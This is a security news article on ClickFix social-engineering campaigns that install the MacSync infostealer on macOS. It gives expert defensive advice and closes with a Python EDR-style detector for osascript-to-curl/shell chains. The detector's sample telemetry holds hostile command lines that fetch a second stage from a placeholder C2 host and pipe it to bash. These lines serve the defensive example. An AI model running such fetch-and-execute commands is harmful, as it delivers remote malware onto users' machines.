A series of three ClickFix campaigns targeting macOS users with the MacSync infostealer used social engineering to trick victims into installing the malware themselves, according to Sophos researchers.

In a March 11 blog post, the researchers said the campaigns show a clear progression in sophistication over the last three months. The first used fake Google search ads promoting a fraudulent “ChatGPT Atlas” browser download hosted on Google Sites. When users attempted to download the software, they were prompted to run a command that ultimately installed the MacSync infostealer.

A second campaign directed users to shared ChatGPT conversations that appeared to offer legitimate advice about Mac tools, the researchers explained. Those conversations then led victims to malicious pages that mimicked trusted developer platforms such as GitHub.

According to the researchers, the third campaign introduced more advanced techniques, including multi-stage loaders, AppleScript payloads, and in-memory execution designed to evade detection and improve persistence.

The Sophos team said the three campaigns reflect a broader trend: attackers are increasingly targeting macOS and continuously adjusting their methods in response to defenses and investigations. The evolving ClickFix strategy shows how social engineering, combined with adaptable malware delivery, remains a powerful tool for cybercriminals seeking to steal credentials and sensitive data.

Collin Hogue-Spears, senior director of solution management at Black Duck, explained that ClickFix slips past file-based macOS defenses because the user executes the attack through Terminal, a surface most security teams still treat as unmanaged.

“ClickFix is not really a software exploit, it’s a trust exploit,” said Hogue-Spears. “The user runs the attack voluntarily. Recent campaigns used Google-sponsored links and shared ChatGPT conversations to walk users through what looked like legitimate software installs. In the February 2026 macOS variant, the user pastes one command into Terminal, the loader retrieves AppleScript from command and control, and the payload executes in memory without writing to disk.”

Hogue-Spears said security practitioners must treat Terminal as a privileged application on macOS endpoints. Here is his advice:

- Push MDM configuration profiles that block Terminal and command-line interpreter access for standard user accounts.
- Layer a Privacy Preferences Policy Control payload that pre-denies Terminal Full Disk Access; this stops the fake System Preferences credential dialog from escalating permissions even when the user enters their password.
- Deploy EDR behavioral rules that flag osascript spawning curl or bash child processes (T1059.002 chaining to T1059.004), because that exact parent-child chain is the February 2026 variant’s execution signature. Baseline the organization’s developer population first; curl-pipe-shell from Terminal is also how Homebrew installs. Those three controls break every stage of the current ClickFix macOS execution chain.

Michael Bell, co-founder and CEO at Suzu Labs, said that while training is the obvious fix, it is the wrong first move here, because the attack mimics something developers legitimately do every day. Homebrew, Rust, nvm, and dozens of other tools install through `curl | sh` in Terminal, Bell said, so security teams cannot tell technical staff “never paste commands” when that is how half their toolchain actually works.

“Security teams need to solve this upstream with managed package registries, MDM-enforced application distribution, and allowlisted installation sources that take the decision out of individual hands,” said Bell. “If someone on the team needs to evaluate a new AI tool, that should happen in a sandboxed environment with no access to production credentials, SSH keys, or cloud tokens. The 20 campaigns Pillar Security documented in the last six weeks show that this is now an industrialized attack surface, not a novelty, and organizations need to treat every developer workstation as a high-value target.”

Jaron Bradley, director of Jamf Threat Labs, said AI has accomplished many great things, especially in giving users instant answers that once required multiple clicks through Google results to find. That convenience, Bradley said, has also made many users more reckless than before.

“It’s important to keep in mind that just like humans, AI can also be tricked from time to time,” said Bradley. “Google Sponsored Ads have played — and will likely continue to play — a significant role in the distribution of infostealer malware. Attackers understand the common software needs of users and craft malicious ads that appear legitimate, and then wait for the user to stumble upon them.”
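To show what the EDR behavioral rule in Hogue-Spears’s advice looks like in practice, and how the baselining caveat about curl-pipe-shell from Terminal fits alongside it, here is an added Python example written for this article. It is not code from Sophos, Black Duck or any EDR vendor. The process-start events below are constructed, not captured telemetry, and the field names pid, ppid, exe and argv are an assumed schema, as are the example.invalid hostnames. The script walks each process’s ancestry and alerts on any curl or shell interpreter that descends from osascript (T1059.002 chaining to T1059.004), while a curl launched from an interactive Terminal session with no osascript in its lineage is only recorded as a baseline observation.

```python
"""Flag the osascript -> curl/shell execution chain in process telemetry.

Added example for this article (not vendor code). Replays constructed
process-start events and reports:
  * alerts   - curl/bash/sh/zsh whose ancestry passes through osascript
  * baseline - curl run from a Terminal session with no osascript ancestor,
               the pattern developer installers such as Homebrew produce
"""
import json
import os

# Constructed sample telemetry (not real captures). Field names are an
# assumed EDR schema; hostnames under example.invalid are placeholders.
SAMPLE_EVENTS = r"""
{"pid": 100, "ppid": 1,   "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "argv": ["Terminal"]}
{"pid": 101, "ppid": 100, "exe": "/bin/zsh", "argv": ["-zsh"]}
{"pid": 102, "ppid": 101, "exe": "/bin/bash", "argv": ["bash", "-c", "$(curl -fsSL https://installer.example.invalid/install.sh)"]}
{"pid": 103, "ppid": 102, "exe": "/usr/bin/curl", "argv": ["curl", "-fsSL", "https://installer.example.invalid/install.sh"]}
{"pid": 104, "ppid": 101, "exe": "/usr/bin/osascript", "argv": ["osascript", "-e", "do shell script \"curl -fsSL https://c2.example.invalid/stage2 | bash\""]}
{"pid": 105, "ppid": 104, "exe": "/bin/sh", "argv": ["sh", "-c", "curl -fsSL https://c2.example.invalid/stage2 | bash"]}
{"pid": 106, "ppid": 105, "exe": "/usr/bin/curl", "argv": ["curl", "-fsSL", "https://c2.example.invalid/stage2"]}
{"pid": 107, "ppid": 105, "exe": "/bin/bash", "argv": ["bash"]}
{"pid": 108, "ppid": 1,   "exe": "/usr/bin/osascript", "argv": ["osascript", "/tmp/update.scpt"]}
{"pid": 109, "ppid": 108, "exe": "/usr/bin/curl", "argv": ["curl", "-s", "https://c2.example.invalid/beacon"]}
"""

FETCH_OR_SHELL = {"curl", "bash", "sh", "zsh"}   # children the rule cares about
SCRIPT_HOST = "osascript"                        # T1059.002 AppleScript host
TERMINAL = "Terminal"                            # interactive developer session


def load_events(text):
    """Parse one JSON process-start record per non-empty line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def build_tree(events):
    """Index events by pid so any process's lineage can be walked."""
    return {e["pid"]: e for e in events}


def ancestry(tree, pid):
    """Image basenames from pid upward, child first, stopping at an unknown
    parent (launchd, pid 1, is not in the sample) or on a pid cycle."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        event = tree[pid]
        chain.append(os.path.basename(event["exe"]))
        pid = event["ppid"]
    return chain


def detect(events):
    """Return (alerts, baseline) for the parent-child rule described above."""
    tree = build_tree(events)
    alerts, baseline = [], []
    for event in events:
        name = os.path.basename(event["exe"])
        if name not in FETCH_OR_SHELL:
            continue
        chain = ancestry(tree, event["pid"])
        ancestors = chain[1:]
        if SCRIPT_HOST in ancestors:
            alerts.append({
                "pid": event["pid"],
                "rule": "T1059.002 -> T1059.004",
                "direct": ancestors[0] == SCRIPT_HOST,  # immediate child of osascript
                "chain": " <- ".join(chain),
                "argv": event["argv"],
            })
        elif name == "curl" and TERMINAL in ancestors:
            # curl from an interactive Terminal session with no AppleScript host
            # in its lineage: expected for developer installers, count it toward
            # the baseline instead of alerting.
            baseline.append({"pid": event["pid"], "chain": " <- ".join(chain)})
    return alerts, baseline


if __name__ == "__main__":
    found, seen_normal = detect(load_events(SAMPLE_EVENTS))
    for alert in found:
        level = "HIGH" if alert["direct"] else "MEDIUM"
        print(f"[{level}] pid {alert['pid']} {alert['rule']}: {alert['chain']}")
    for item in seen_normal:
        print(f"[baseline] pid {item['pid']}: {item['chain']}")
```

Direct children of osascript are reported at a higher level than deeper descendants because the direct pairing is the exact signature the advice names; the descendant match catches the common `do shell script` form where osascript spawns sh, which then spawns curl and bash. In a real deployment the baseline branch would be fed by a period of observation across the developer population before the alerting branch is turned on.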